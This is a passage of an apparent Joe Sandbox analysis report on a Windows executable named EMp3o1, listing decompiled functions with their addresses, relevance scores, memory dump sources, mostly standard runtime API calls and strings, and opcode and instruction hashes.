                                                • Instruction ID: 6f20fcceddb47c257b385d19bff2111c6c0186bb51a245ba5e9f9cdf7640955f
                                                • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                • Instruction Fuzzy Hash: C8113820B0F64246FA647321597127931969F84BF0F448735E92E06BDBDF2CE471A70C
                                                Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                • String ID:
                                                • API String ID: 3326452711-0
                                                • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                • API String ID: 2984211723-1229430080
                                                • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                Function 00007FFDAC087F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                • Instruction ID: 861f30f6e18e9e41b2c068874627be075b5c45f2111c6147ffe9eed4c0536d53
                                                • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                • Instruction Fuzzy Hash: FBF06261B1B60285EB208B29E4653396720AF887F1F540335DA6D463FACF3CD469E74C
                                                Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                • ExitProcess.KERNEL32 ref: 0000000140008545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressExitHandleModuleProcProcess
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 75539706-1276376045
                                                • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                Function 00007FFDAC0840D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                • Instruction ID: a7dfda48d7a832d2e6d36119519b2cbac14c07a9a0431d00c032da6129f4bb55
                                                • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                • Instruction Fuzzy Hash: 6FB18A22B0F68281EA75CAA594706397790AF54BE4F49C835DB4C0778BDF2CE462A30C
                                                Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: FileInfoSleepStartupType
                                                • String ID:
                                                • API String ID: 1527402494-0
                                                • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                • String ID:
                                                • API String ID: 3078728599-0
                                                • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 1850339568-0
                                                • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                Function 00007FFDAC08FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                • Instruction ID: 6fe893a8b7f7f69ddf03af39da29d068740fb628badfa901e448138ed8e0ecbb
                                                • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                • Instruction Fuzzy Hash: 0A115E72F1EA5B01F6A41178E57637920516F9C7F4F148634E5AE063DB8F2CE8606B0D
                                                Function 00007FFDAC089684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FlsGetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896A3
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896C2
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896EA
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC0896FB
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC08766F,?,?,00000000,00007FFDAC08790A,?,?,?,?,?,00007FFDAC087896), ref: 00007FFDAC08970C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                • Instruction ID: 4401f45b63c78aefb4722a90d2d25a6d33f12cffe706c08c085d515959c7593d
                                                • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                • Instruction Fuzzy Hash: 57116D20B0F24245FA687725697117931915F44BF0F588335E86E067CBEF2CE461A70C
                                                Function 00007FFDAC089518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                • Instruction ID: 6bf9051f1b020aed11ca7476cc668a982bce46db50200ac0ca0353189d363966
                                                • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                • Instruction Fuzzy Hash: 3E11B050B4F2065AFA78B661587227932914F84BF0E588735D92E0A7D3EF2CF461A70C
                                                Function 00007FFDAC085448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                • Instruction ID: 76cf5ec1040fd5762469fa946a1a0914adf410a27ccff2c2dd52c772ed7ab070
                                                • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                • Instruction Fuzzy Hash: 27919373B09B818AEB20CF64E4602AD7BA0F7447D8F14813AEA4D57756DF38D1A5DB08
                                                Function 00007FFDAC083A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 2395640692-1018135373
                                                • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                • Instruction ID: 70a89f2b906ee3799f0ca52db6b30d344498930ccae12a26931a1f6c461d0b5f
                                                • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                • Instruction Fuzzy Hash: 1851B331B1A6428ADB248F19D464A7D7791EB84BE8F10C131DA4A43746DF7DE861DB0C
                                                Function 00007FFDAC0851D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                • Instruction ID: 567c2e89890ac2ef4be90e7906f7b0fae13703eb2c86d426548b49e4da6d7358
                                                • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                • Instruction Fuzzy Hash: F3619432A09BC585EB718F15E4503A9B7A0FB857E4F048225EB9C47B96CF7CD1A0DB08
                                                Function 00007FFDAC0859C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 3896166516-3733052814
                                                • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                • Instruction ID: 4494ebb3a1b1570791fcebc11305ed7827615b9580a0ec3c8227152fdbc8ab40
                                                • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                • Instruction Fuzzy Hash: 0C517E32B0A3828AEF748F1594A426876A1EB64BE4F14C135DA5D87786CF3CE461DB0D
                                                Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressHandleLoadModuleProc
                                                • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                • API String ID: 3055805555-3733552308
                                                • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Process$CurrentSizeWorking
                                                • String ID: Shrinking process size
                                                • API String ID: 2122760700-652428428
                                                • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$Leave
                                                • String ID:
                                                • API String ID: 2801635615-0
                                                • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                Function 00007FFDAC08E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 2718003287-0
                                                • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                • Instruction ID: 831bd74ffc12c5f41fda9ef2ef6850ebfc3f13e5dfc29575dc48f9cabb7a5d4b
                                                • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                • Instruction Fuzzy Hash: 61D1E536B0AA8189E720CF65D4502EC37B1F744BE8B508275CE6D57B9ADF38D426D348
